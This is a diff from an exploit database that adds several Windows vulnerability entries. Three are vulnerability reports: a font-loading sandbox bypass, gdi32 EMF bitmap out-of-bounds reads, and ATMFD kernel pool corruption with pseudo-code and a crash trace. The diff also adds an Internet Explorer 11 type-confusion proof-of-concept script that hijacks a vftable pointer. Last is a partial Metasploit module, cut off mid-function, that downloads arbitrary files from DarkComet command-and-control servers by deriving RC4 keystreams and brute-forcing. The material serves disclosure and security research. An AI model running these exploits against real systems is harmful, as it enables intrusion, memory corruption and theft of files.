Note: I effectively presented this at the Troopers conference and even said how I did it so this is sort of been publicly disclosed. But that was using object manager symbolic links, and due to the way the font files are loaded this wasn’t usable in a sandbox due to it opening the files at kernel privilege. I pointed out to the attendees that I didn’t think it was easy to exploit in a sandbox so it wasn’t a problem. I’ve spoke to Gavin Thomas about this, he wanted the PoC sending even if unexploitable. As this seems to be more of a problem thought I’d send into secure@.
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low.
|
||||
|
||||
1) Extract the PoC to a location on a local hard disk which is writable by a low IL user. This is necessary as the PoC needs to copy a font file to the applications directory. You also need a copy the pacifioc.ttf font file into the same directory.
|
||||
2) Execute the poc executable file as low integrity.
|
||||
|
||||
Expected Result:
|
||||
It shouldn’t be possible to load a custom font from disk if it’s outside of the system font location.
|
||||
|
||||
Observed Result:
|
||||
The font is loaded and can be used with GDI.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39993.zip
|
||||
|
56
platforms/windows/dos/39990.txt
Executable file
56
platforms/windows/dos/39990.txt
Executable file
|
@ -0,0 +1,56 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=757
|
||||
|
||||
As clearly visible in the EMF (Enhanced Metafile) image format specification ([MS-EMF]), there are multiple records which deal with DIBs (Device Independent Bitmaps). Examples of such records are EMR_ALPHABLEND, EMR_BITBLT, EMR_MASKBLT, EMR_PLGBLT, EMR_SETDIBITSTODEVICE, EMR_STRETCHBLT, EMR_STRETCHDIBITS, EMR_TRANSPARENTBLT, EMR_CREATEDIBPATTERNBRUSHPT, EMR_CREATEMONOBRUSH and EMR_EXTCREATEPEN.
|
||||
|
||||
The DIB format is relatively complex, since the headers and data itself may be interpreted in a number of ways depending on a combination of settings found in the headers. For example, various (de)compression algorithms can be applied to the data depending on the BITMAPINFOHEADER.biCompression field, and the image data can either be treated as RGB, or indexes into a color palette, depending on BITMAPINFOHEADER.biBitCount. The Windows API functions taking DIBs on input work under the assumption that the passed bitmap is valid, and particularly that there is enough memory in the image buffer to cover all picture pixels.
|
||||
|
||||
The EMF format essentially works as a proxy for GDI calls, and therefore the burden of a thorough DIB sanitization is on the underlying implementation. We have found the sanitization performed by a number of EMF record handlers in the gdi32.dll user-mode library to be insufficient, leading to heap-based out-of-bounds reads while parsing/loading the bitmap, and in some cases to a subsequent memory disclosure. Since the bugs are present in a core Windows library, all of its clients which allow the loading of arbitrary EMF images are affected. The severity is highest for software which makes it possible to recover the disclosed heap bytes, as an attacker could then steal secret information from the program's memory, or defeat the ASLR exploit mitigation mechanism to reliably take advantage of another vulnerability.
|
||||
|
||||
The DIB-embedding records follow a common scheme: they include four fields, denoting the offsets and lengths of the DIB header and DIB data, respectively (named offBmiSrc, cbBmiSrc, offBitsSrc, cbBitsSrc). A correct implementation should:
|
||||
|
||||
1) Verify that cbBmiSrc is within expected bounds, accounting for the DIB header, color palette etc.
|
||||
2) Verify that the (offBmiSrc, offBmiSrc + cbBmiSrc) region resides within the record buffer's area.
|
||||
3) Verify that cbBitsSrc is within expected bounds, and especially that it is larger or equal the expected number of bitmap bytes.
|
||||
4) Verify that the (offBitsSrc, offBitsSrc + cbBitsSrc) region resides within the record buffer's area.
|
||||
|
||||
If any of the above steps is not executed correctly, it is possible for an attacker to craft an EMF file which causes gdi32.dll to attempt to create DIB objects based on out-of-bounds memory. As it turns out, many EMF record handlers fail to perform exhaustive sanitization. Our analysis was based on a 32-bit gdi32.dll file found in the C:\Windows\SysWOW64 directory on a fully patched Windows 7 operating system. The problems we have discovered are as follows:
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
- MRALPHABLEND::bPlay
|
||||
- MRBITBLT::bPlay
|
||||
- MRMASKBLT::bPlay
|
||||
- MRPLGBLT::bPlay
|
||||
- MRSTRETCHBLT::bPlay
|
||||
- MRTRANSPARENTBLT::bPlay
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
Conditions (1) and (2) are not checked.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
- MRSETDIBITSTODEVICE::bPlay
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
Condition (3) is not checked.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
- MRSTRETCHDIBITS::bPlay
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
Conditions (1) and (3) are not checked.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
- MRSTRETCHDIBITS::bPlay
|
||||
- MRCREATEMONOBRUSH::bPlay
|
||||
- MREXTCREATEPEN::bPlay
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
Conditions (1), (2), (3) and (4) are not checked.
|
||||
|
||||
Please note that seeing the general class of bugs and how widespread it is across various DIB-related EMF handlers, we only performed a cursory analysis to see which checks are missing from which functions. It is possible that there are more missing sanity checks in some of them that we haven't noted in the list above. We recommend performing a careful security audit of the handlers dealing with DIBs, to ensure they perform correct and complete sanitization of the input data.
|
||||
|
||||
In order to demonstrate that the bug is real and affects Internet Explorer (among other targets - Microsoft Office 2013 was also tested), we have hacked up a proof-of-concept EMF file, which includes a specially crafted EMR_STRETCHBLT record, which in turn contains a 8 bpp DIB, whose palette entries go beyond the record area. Each time the image is opened in Internet Explorer, it is displayed differently, as the garbage heap bytes beyond the allocated buffer change. Attached is also a screenshot of the proof of concept picture, as displayed by Internet Explorer 11 on Windows 7 when opened three times in a row.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39990.zip
|
||||
|
153
platforms/windows/dos/39991.txt
Executable file
153
platforms/windows/dos/39991.txt
Executable file
|
@ -0,0 +1,153 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=785
|
||||
|
||||
The Adobe Type Manager Font Driver (ATMFD.DLL) responsible for handling PostScript and OpenType fonts in the Windows kernel provides a channel of communication with user-mode applications via an undocumented gdi32!NamedEscape API call. The nature of the channel is similar to IOCTLs [1] of type METHOD_BUFFERED [2], in that it also uses a 32-bit escape code (equivalent to control codes in IOCTL), and input and output buffers employed to pass data to the driver and receive information back. We suspect that this little known interface was originally designed to be more universal, but since ATMFD has remained the only third-party font driver in Windows for the past two decades, in reality it can only be used to interact with this single module.
|
||||
|
||||
Considering that there hasn't been any public research into the security of ATMFD's NamedEscape handlers, it is likely that it hasn't been thoroughly audited since the creation of the code. The first public vulnerability disclosed in the interface was a 0-day pool corruption (stemming from a 16-bit signedness issue) discovered in Hacking Team's leaked data dump [3], and subsequently fixed by Microsoft in the MS15-077 bulletin [4]. That security issue motivated us to have a deeper look into the security posture of the code area.
|
||||
|
||||
The main hurdle in approaching the NamedEscape attack surface is that Microsoft provides no symbols or other debugging information for the ATMFD.DLL library via the Microsoft Symbol Server, which means that all functionality needs to be reverse-engineered from the ground up, with no hints available whatsoever. At least that was what we believed until recently, when we discovered that the user-mode counterpart of ATMFD is ATMLIB.DLL -- a legacy library rarely used by the operating system nowadays, but which comes with debug symbols and implements many of its features by making NamedEscape calls to the kernel-mode driver. This lead to the further discovery of the "Adobe Type Manager Software API for Windows 95 and Windows NT 4" [5] and "Adobe Type Manager Software API: Windows" [6] documents, which greatly helped us understand the semantics of most of the escape codes, some of the underlying structures and other specifics of the code.
|
||||
|
||||
All further analysis presented below is relevant to an ATMFD.DLL file found on Windows 7 32-bit, version 5.1.2.247, md5sum e85bed746bbddcd29ad63f6085e1ce78. The driver currently supports 13 different escape codes in the range of 0x2500 - 0x2514. The bug discussed in this report resides in the handler of code 0x250C, which we have named "ATMGetGlyphName", based on the observation of its behavior and how it is used in the ATMLIB!ATMGetGlyphListW function.
|
||||
|
||||
Since the execution flow down the call stack is quite complex before we can reach the vulnerable condition, let's briefly summarize the major stages of execution:
|
||||
|
||||
1) The i/o buffer size is enforced to be exactly 48 bytes.
|
||||
2) The ATMGetGlyphName handler function (atmfd+0x1F12) locates the font object based on its kernel-mode address provided at offset 4 of the i/o buffer.
|
||||
3) The font is mapped into memory (?) by a function at atmfd+0x5AC6.
|
||||
4) More logic follows depending on whether the font is a PostScript or OpenType one. We have found the PostScript-specific logic to be uninteresting, so we'll follow the OpenType one.
|
||||
5) A function at atmfd+0xDF10 (we call it "FormatOpenTypeGlyphName") is called with a controlled 16-bit glyph index and a pointer to offset 8 of the i/o buffer (to copy the name there).
|
||||
6) In order to retrieve the actual glyph name from the .OTF file, another function at atmfd+0x1A2D6 is invoked, we call it "GetOpenTypeGlyphName".
|
||||
|
||||
Here, the interesting functionality begins. If the glyph id is between 0 and 390, the name is obtained from a hard-coded list of names. Otherwise, it is extracted from the .OTF file itself, by reading from the Name INDEX [7]. The core of the function is as follows (in pseudo-code):
|
||||
|
||||
--- cut ---
|
||||
PushMarkerToStack();
|
||||
|
||||
int glyph_name_offset = ReadCFFEntryOffset(glyph_id);
|
||||
int next_glyph_name_offset = ReadCFFEntryOffset(glyph_id + 1);
|
||||
|
||||
*pNameLength = next_glyph_name_offset - glyph_name_offset;
|
||||
|
||||
EnsureBytesAreAvailable(next_glyph_name_offset - glyph_name_offset);
|
||||
|
||||
PopMarkerFromStack();
|
||||
--- cut ---
|
||||
|
||||
The function addresses are as follows:
|
||||
|
||||
+-------------------------+---------------+
|
||||
| Function | Address |
|
||||
+-------------------------+---------------+
|
||||
| PushMarkerToStack | inlined |
|
||||
| ReadCFFEntryOffset | atmfd+0x1994D |
|
||||
| EnsureBytesAreAvailable | atmfd+0x18D11 |
|
||||
| PopMarkerFromStack | atmfd+0x18B34 |
|
||||
+-------------------------+---------------+
|
||||
|
||||
The code construct is consistent with the general Name INDEX structure, which is as follows:
|
||||
|
||||
+---------+------------------+------------------------------------------------+
|
||||
| Type | Name | Description |
|
||||
+---------+------------------+------------------------------------------------+
|
||||
| Card16 | count | Number of object stored in INDEX |
|
||||
| OffSize | offSize | Offset array element size |
|
||||
| Offset | offset [count+1] | Offset array (from byte preceding object data) |
|
||||
| Card8 | data[<varies>] | Object data |
|
||||
+---------+------------------+------------------------------------------------+
|
||||
|
||||
In order to extract any data from an index, it is necessary to read the offset of the interesting entry, and the next one (to calculate the length), which is what the function does. What are the PushMarkerToStack and PopMarkerFromStack functions, though? As it turns out, the font object being operated on has a 16-element stack (each element 32-bit wide). The ATMFD.DLL file contains multiple assertion strings, which show that the stack is internally named "HeldDataKeys", the element counter is "nHeldDataKeys", and a special -1 value pushed on the stack is "MARK":
|
||||
|
||||
"fSetPriv->HeldDataKeys[ fSetPriv->nHeldDataKeys-1] == MARK"
|
||||
"fSetPriv->nHeldDataKeys >= 0"
|
||||
"fSetPriv->nHeldDataKeys > 0"
|
||||
"fSetPriv->nHeldDataKeys < MAXHELDDATAKEYS"
|
||||
|
||||
It is generally important for memory safety to never go beyond the bounds of the HeldDataKeys array, as doing otherwise would result in overwriting adjacent fields of the font object structure, or adjacent pool allocations. Therefore, management of the nHeldDataKeys field must be performed very carefully. It appears to be safe in the GetOpenTypeGlyphName function, as only one element is pushed and subsequently popped.
|
||||
|
||||
However, if we have a look into the EnsureBytesAreAvailable function, it turns out that if more bytes are requested than are found in the CFF table of the .OTF file, then an exception is generated and handled internally in the routine. One of the actions taken during the handling of the exception is a call to a function at atmfd+0x18C05, which pops all data from the stack until and including the first occurrence of -1. Since another element is also unconditionally popped at the end of GetOpenTypeGlyphName, two elements are popped for just one pushed, which corrupts the state of the nHeldDataKeys field and makes it possible to set it to a negative value.
|
||||
|
||||
In this specific case, we fully control the Name INDEX being used. Since it is possible to set the offset size to 4 bytes (through the offSize field mentioned above), we can fully control both 32-bit return values of the ReadCFFEntryOffset calls, and thus also their difference, which is passed as an argument to EnsureBytesAreAvailable.
|
||||
|
||||
In the simplest scenario, triggering the vulnerability in ATMGetGlyphName indefinitely will decrement the nHeldDataKeys field one by one, and overwrite earlier and earlier DWORDs on the pool with 0xffffffff (starting with the font object itself, and then moving onto adjacent pool allocations). This is sufficient to demonstrate pool corruption and a system crash; however, it is also possible to maintain a higher degree of control over what is written to the out-of-bounds memory region, by invoking other escape handlers which push more than just the marker, once nHeldDataKeys is already adjusted to where we want to write. This should enable easier and more reliable exploitation.
|
||||
|
||||
Another potential obstacle in exploitation could be the fact that the font being operated on must be identified by its kernel-mode address. In practice, however, this is not a problem, as the address can be quickly brute-forced by testing addresses nearby the addresses of other GDI objects (whose locations are available to user-mode programs). This technique was used in the HackingTeam exploit for escape 0x2514. To make it even simpler, the provided proof-of-concept code just brute-forces the entire 32-bit kernel address space, which only takes a few seconds to locate the font object and trigger the bug.
|
||||
|
||||
If we start an exploit which triggers the vulnerability 100 times on a system with Special Pools enabled, we should observe the following or similar bugcheck:
|
||||
|
||||
--- cut ---
|
||||
SPECIAL_POOL_DETECTED_MEMORY_CORRUPTION (c1)
|
||||
Special pool has detected memory corruption. Typically the current thread's
|
||||
stack backtrace will reveal the guilty party.
|
||||
Arguments:
|
||||
Arg1: fe67ef50, address trying to free
|
||||
Arg2: fe67ee28, address where bits are corrupted
|
||||
Arg3: 006fa0b0, (reserved)
|
||||
Arg4: 00000023, caller is freeing an address where nearby bytes within the same page have been corrupted
|
||||
|
||||
Debugging Details:
|
||||
------------------
|
||||
|
||||
[...]
|
||||
|
||||
BUGCHECK_STR: 0xC1_23
|
||||
|
||||
SPECIAL_POOL_CORRUPTION_TYPE: 23
|
||||
|
||||
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
|
||||
|
||||
PROCESS_NAME: csrss.exe
|
||||
|
||||
CURRENT_IRQL: 2
|
||||
|
||||
LAST_CONTROL_TRANSFER: from 82930dd7 to 828cc318
|
||||
|
||||
STACK_TEXT:
|
||||
9f4963e4 82930dd7 00000003 c453df12 00000065 nt!RtlpBreakWithStatusInstruction
|
||||
9f496434 829318d5 00000003 fe67e000 fe67ee28 nt!KiBugCheckDebugBreak+0x1c
|
||||
9f4967f8 82930c74 000000c1 fe67ef50 fe67ee28 nt!KeBugCheck2+0x68b
|
||||
9f496818 82938b57 000000c1 fe67ef50 fe67ee28 nt!KeBugCheckEx+0x1e
|
||||
9f49683c 8293963d fe67ef50 fe67e000 fe67ef50 nt!MiCheckSpecialPoolSlop+0x6e
|
||||
9f49691c 82973b90 fe67ef50 00000000 fe67ef50 nt!MmFreeSpecialPool+0x15b
|
||||
9f496984 96a609cc fe67ef50 00000000 fe67ef60 nt!ExFreePoolWithTag+0xd6
|
||||
9f496998 96b44ec1 fe67ef60 09fe969f 00000000 win32k!VerifierEngFreeMem+0x5b
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
9f4969cc 96b43850 fe67ef68 09fe9553 00000000 ATMFD+0x14ec1
|
||||
9f496a00 96b329ab 9f496a24 96b4a736 96b6f024 ATMFD+0x13850
|
||||
9f496a08 96b4a736 96b6f024 fe744fc0 fe63ccf8 ATMFD+0x29ab
|
||||
9f496a24 96b41516 fe744fb0 09fe952f fe63ccf8 ATMFD+0x1a736
|
||||
9f496a7c 96b377e0 09fe95e7 96a60c8e 9f496b40 ATMFD+0x11516
|
||||
9f496ab4 96b34196 09fe95b7 96a60c8e 9f496b40 ATMFD+0x77e0
|
||||
9f496ae4 969ce0a1 fde3a898 fde3a898 9f496b80 ATMFD+0x4196
|
||||
9f496b1c 969ce2c4 fde3a898 fde3a898 00000000 win32k!PDEVOBJ::DestroyFont+0x67
|
||||
9f496b4c 96954607 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x33
|
||||
9f496b74 969561fe 9f496b98 fde3a898 00000000 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x6fb
|
||||
9f496ba4 96a1fcc4 00000001 ffbbc234 89a3f7f0 win32k!PFTOBJ::bUnloadWorkhorse+0x114
|
||||
9f496bcc 96a29ae9 9f496c58 0000002b 00000001 win32k!GreRemoveFontResourceW+0xa0
|
||||
9f496d14 8288ea16 00319768 0000002b 00000001 win32k!NtGdiRemoveFontResourceW+0x111
|
||||
9f496d14 76dd70d4 00319768 0000002b 00000001 nt!KiSystemServicePostCall
|
||||
0022fca4 76de6113 76de5e20 00000020 00000028 ntdll!KiFastSystemCallRet
|
||||
0022fd84 76dd6078 00000000 00000000 00000090 ntdll!RtlpAllocateHeap+0xe68
|
||||
0022fe14 76de60e4 76de6113 76ec93f1 75957040 ntdll!ZwQueryInformationProcess+0xc
|
||||
003b0108 00000000 00000000 00000000 00000000 ntdll!RtlpAllocateHeap+0xab2
|
||||
--- cut ---
|
||||
|
||||
One could wonder if this issue could be triggered directly from within Internet Explorer, via an embedded .OTF font file and an .EMF image containing EMR_NAMEDESCAPE records. One obvious problem is that the font object needs to be identified by its kernel-mode address, which neither the EMF file or even the JavaScript code running in the browser knows. On 64-bit platforms, this address would have to be leaked into JS, which is not a trivial task since the value is not typically stored in the heap, and therefore impossible without using another vulnerability (e.g. an arbitrary read from the GDI handle table). On 32-bit platforms, it could actually be feasible to simply brute-force the address, by including an EMR_NAMEDESCAPE-based exploit chain for every location possible. This, while theoretically feasible, would blow the size of the EMF up to the orders of hundreds of megabytes, making a practical attack unrealistic.
|
||||
|
||||
The other obstacle is some obscure reference counting problem with ATMFD. In order for the same object (which contains the HeldDataKeys stack) to persist between multiple calls to NamedEscape (which is what makes it possible to underflow the stack by more than 4 bytes), it is necessary to reference the font after loading it in the system, e.g. with functions such as TextOut() or GetTextMetrics(). However, Internet Explorer does not seem to interact with the font object in any way after loading it in the system, and since the loading itself takes place via a AddFontMemResourceEx API call, the font is private and non-enumerable, meaning that it is impossible to reference it except for the returned handle itself. Until now, we haven't found a way to trigger a large pool corruption from the context of a website, but it could still be possible.
|
||||
|
||||
Attached you can find a proof of concept program, which together with the specially crafted .OTF font demonstrates a local pool corruption.
|
||||
|
||||
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
|
||||
|
||||
References:
|
||||
[1] https://msdn.microsoft.com/pl-pl/library/windows/desktop/aa363219%28v=vs.85%29.aspx
|
||||
[2] https://msdn.microsoft.com/pl-pl/library/windows/hardware/ff565356%28v=vs.85%29.aspx
|
||||
[3] https://bugs.chromium.org/p/project-zero/issues/detail?id=473
|
||||
[4] https://technet.microsoft.com/library/security/ms15-077
|
||||
[5] https://partners.adobe.com/public/developer/en/atm/5642.ATMWin95andNT.pdf
|
||||
[6] https://partners.adobe.com/public/developer/en/atm/5073.ATM.API_Win.pdf
|
||||
[7] https://partners.adobe.com/public/developer/en/font/5176.CFF.pdf
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39991.zip
|
||||
|
96
platforms/windows/dos/39994.html
Executable file
96
platforms/windows/dos/39994.html
Executable file
|
@ -0,0 +1,96 @@
|
|||
<!--
|
||||
CVE-2016-0199 / MS16-063: MSIE 11 garbage collector attribute type confusion
|
||||
============================================================================
|
||||
This information is available in an easier to read format on my blog at
|
||||
http://blog.skylined.nl/
|
||||
|
||||
With [MS16-063] Microsoft has patched [CVE-2016-0199]: a memory
|
||||
corruption bug
|
||||
in the garbage collector of the JavaScript engine used in Internet
|
||||
Explorer 11.
|
||||
By exploiting this vulnerability, a website can causes this garbage
|
||||
collector
|
||||
to handle some data in memory as if it was an object, when in fact it
|
||||
contains
|
||||
data for another type of value, such as a string or number. The garbage
|
||||
collector code will use this data as a virtual function table (vftable)
|
||||
in order
|
||||
to make a virtual function call. An attacker has enough control over
|
||||
this data
|
||||
to allow execution of arbitrary code.
|
||||
|
||||
Known affected software and attack vectors
|
||||
------------------------------------------
|
||||
+ **Microsoft Internet Explorer 11** (all versions before the June 2016
|
||||
patch)
|
||||
|
||||
An attacker would need to get a target user to open a specially crafted
|
||||
webpage. Disabling JavaScript should prevent an attacker from
|
||||
triggering the
|
||||
vulnerable code path.
|
||||
|
||||
Repro
|
||||
-----
|
||||
I've created two separate html files that can be used to reproduce this
|
||||
issue
|
||||
and shows control over a 32-bit vftable pointer in x86 versions of MSIE or a
|
||||
partial control over a 64-bit vftable pointer in x64 versions.
|
||||
-->
|
||||
|
||||
<!DOCTYPE html>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=7">
|
||||
<script>
|
||||
oElement = document.createElement("IMG");
|
||||
var oAttr = document.createAttribute("loop");
|
||||
oAttr.nodeValue = oElement;
|
||||
oElement.loop = 0x41424344; // Set original value data to 44 43 42 41
|
||||
oElement.setAttributeNode(oAttr); // Replace oElement with original value data
|
||||
oElement.removeAttributeNode(oAttr);
|
||||
CollectGarbage(); // Use original value data as address 0x41424344 of a vftable
|
||||
</script>
|
||||
|
||||
<!--
|
||||
(I've had to use xcript rather than script because Gmail refused to send it
|
||||
otherwise, see https://support.google.com/mail/answer/6590 for the reason.)
|
||||
|
||||
Description
|
||||
-----------
|
||||
When `setAttributeNode` is used to set an attribute of a HTML element,
|
||||
and the
|
||||
`Attr` node's `nodeValue` is not a valid value, this `nodeValue` is set
|
||||
to the
|
||||
value the attribute had before the call. This can happen for instance
|
||||
when you
|
||||
try to set an attribute that must have a string or number value by using an
|
||||
`Attr` node with a HTML element as its `nodeValue` (as this is not a
|
||||
string or
|
||||
number). The HTML element in `nodeValue` is replaced with the string or
|
||||
number
|
||||
value the attribute had before the call to `setAttributeNode`.
|
||||
|
||||
If the `Attr` node is then removed using `removeAttributeNode` and the
|
||||
garbage
|
||||
collector runs, the code appears to assume the nodeValue still contains an
|
||||
object, rather than the string or number it has been changed into. This
|
||||
causes
|
||||
the code to use the data for the string or number value as if it was a C++
|
||||
object. It attempts to determine a function pointer for a method from the
|
||||
object's virtual function table before calling this function using the
|
||||
pointer.
|
||||
|
||||
If the previous value is a string, the character data from the string is
|
||||
used
|
||||
to calculate the function pointer. If the previous value is a number,
|
||||
the value
|
||||
of the number is used. This provides an attacker with a large amount of
|
||||
control
|
||||
over the function pointer and may allow execution of arbitrary code.
|
||||
|
||||
Scanner
|
||||
-------
|
||||
I build a "scanner" to analyze this issue and help create two
|
||||
proof-of-concept
|
||||
files that show control over the vftable pointer. More details and the
|
||||
source
|
||||
for these can be found on my blog at http://blog.skylined.nl.
|
||||
-->
|
424
platforms/windows/remote/39985.rb
Executable file
424
platforms/windows/remote/39985.rb
Executable file
|
@ -0,0 +1,424 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'DarkComet Server Remote File Download Exploit',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
|
||||
The exploit does not need to know the password chosen for the bot/server communication.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Shawn Denbow & Jesse Hertz', # Vulnerability Discovery
|
||||
'Jos Wetzels' # Metasploit module, added support for versions < 5.1, removed need to know password via cryptographic attack
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf' ],
|
||||
[ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 08 2012',
|
||||
'Platform' => 'win'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1604),
|
||||
Opt::RHOST('0.0.0.0'),
|
||||
|
||||
OptString.new('LHOST', [true, 'This is our IP (as it appears to the DarkComet C2 server)', '0.0.0.0']),
|
||||
OptString.new('KEY', [false, 'DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)', '']),
|
||||
OptBool.new('NEWVERSION', [false, 'Set to true if DarkComet version >= 5.1, set to false if version < 5.1', true]),
|
||||
OptString.new('TARGETFILE', [false, 'Target file to download (assumes password is set)', '']),
|
||||
OptBool.new('STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]),
|
||||
OptInt.new('BRUTETIMEOUT', [false, 'Timeout (in seconds) for bruteforce attempts', 1])
|
||||
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Functions for XORing two strings, deriving keystream using known plaintext and applying keystream to produce ciphertext
|
||||
def xor_strings(s1, s2)
|
||||
s1.unpack('C*').zip(s2.unpack('C*')).map { |a, b| a ^ b }.pack('C*')
|
||||
end
|
||||
|
||||
def get_keystream(ciphertext, known_plaintext)
|
||||
c = [ciphertext].pack('H*')
|
||||
if known_plaintext.length > c.length
|
||||
return xor_strings(c, known_plaintext[0, c.length])
|
||||
elsif c.length > known_plaintext.length
|
||||
return xor_strings(c[0, known_plaintext.length], known_plaintext)
|
||||
else
|
||||
return xor_strings(c, known_plaintext)
|
||||
end
|
||||
end
|
||||
|
||||
def use_keystream(plaintext, keystream)
|
||||
if keystream.length > plaintext.length
|
||||
return xor_strings(plaintext, keystream[0, plaintext.length]).unpack('H*')[0].upcase
|
||||
else
|
||||
return xor_strings(plaintext, keystream).unpack('H*')[0].upcase
|
||||
end
|
||||
end
|
||||
|
||||
# Use RubyRC4 functionality (slightly modified from Max Prokopiev's implementation https://github.com/maxprokopiev/ruby-rc4/blob/master/lib/rc4.rb)
|
||||
# since OpenSSL requires at least 128-bit keys for RC4 while DarkComet supports any keylength
|
||||
def rc4_initialize(key)
|
||||
@q1 = 0
|
||||
@q2 = 0
|
||||
@key = []
|
||||
key.each_byte { |elem| @key << elem } while @key.size < 256
|
||||
@key.slice!(256..@key.size - 1) if @key.size >= 256
|
||||
@s = (0..255).to_a
|
||||
j = 0
|
||||
0.upto(255) do |i|
|
||||
j = (j + @s[i] + @key[i]) % 256
|
||||
@s[i], @s[j] = @s[j], @s[i]
|
||||
end
|
||||
end
|
||||
|
||||
def rc4_keystream
|
||||
@q1 = (@q1 + 1) % 256
|
||||
@q2 = (@q2 + @s[@q1]) % 256
|
||||
@s[@q1], @s[@q2] = @s[@q2], @s[@q1]
|
||||
@s[(@s[@q1] + @s[@q2]) % 256]
|
||||
end
|
||||
|
||||
def rc4_process(text)
|
||||
text.each_byte.map { |i| (i ^ rc4_keystream).chr }.join
|
||||
end
|
||||
|
||||
def dc_encryptpacket(plaintext, key)
|
||||
rc4_initialize(key)
|
||||
rc4_process(plaintext).unpack('H*')[0].upcase
|
||||
end
|
||||
|
||||
# Try to execute the exploit
|
||||
def try_exploit(exploit_string, keystream, bruting)
|
||||
connect
|
||||
idtype_msg = sock.get_once(12)
|
||||
|
||||
if idtype_msg.length != 12
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
if datastore['KEY'] != ''
|
||||
exploit_msg = dc_encryptpacket(exploit_string, datastore['KEY'])
|
||||
else
|
||||
# If we don't have a key we need enough keystream
|
||||
if keystream.nil?
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
if keystream.length < exploit_string.length
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
exploit_msg = use_keystream(exploit_string, keystream)
|
||||
end
|
||||
|
||||
sock.put(exploit_msg)
|
||||
|
||||
if bruting
|
||||
begin
|
||||
ack_msg = sock.timed_read(3, datastore['BRUTETIMEOUT'])
|
||||
rescue Timeout::Error
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
else
|
||||
ack_msg = sock.get_once(3)
|
||||
end
|
||||
|
||||
if ack_msg != "\x41\x00\x43"
|
||||
disconnect
|
||||
return nil
|
||||
# Different protocol structure for versions >= 5.1
|
||||
elsif datastore['NEWVERSION'] == true
|
||||
if bruting
|
||||
begin
|
||||
filelen = sock.timed_read(10, datastore['BRUTETIMEOUT']).to_i
|
||||
rescue Timeout::Error
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
else
|
||||
filelen = sock.get_once(10).to_i
|
||||
end
|
||||
if filelen == 0
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
if datastore['KEY'] != ''
|
||||
a_msg = dc_encryptpacket('A', datastore['KEY'])
|
||||
else
|
||||
a_msg = use_keystream('A', keystream)
|
||||
end
|
||||
|
||||
sock.put(a_msg)
|
||||
|
||||
if bruting
|
||||
begin
|
||||
filedata = sock.timed_read(filelen, datastore['BRUTETIMEOUT'])
|
||||
rescue Timeout::Error
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
else
|
||||
filedata = sock.get_once(filelen)
|
||||
end
|
||||
|
||||
if filedata.length != filelen
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
sock.put(a_msg)
|
||||
disconnect
|
||||
return filedata
|
||||
else
|
||||
filedata = ''
|
||||
|
||||
if bruting
|
||||
begin
|
||||
msg = sock.timed_read(1024, datastore['BRUTETIMEOUT'])
|
||||
rescue Timeout::Error
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
else
|
||||
msg = sock.get_once(1024)
|
||||
end
|
||||
|
||||
while (!msg.nil?) && (msg != '')
|
||||
filedata += msg
|
||||
if bruting
|
||||
begin
|
||||
msg = sock.timed_read(1024, datastore['BRUTETIMEOUT'])
|
||||
rescue Timeout::Error
|
||||
break
|
||||
end
|
||||
else
|
||||
msg = sock.get_once(1024)
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
if filedata == ''
|
||||
return nil
|
||||
else
|
||||
return filedata
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Fetch a GetSIN response from C2 server
|
||||
def fetch_getsin
|
||||
connect
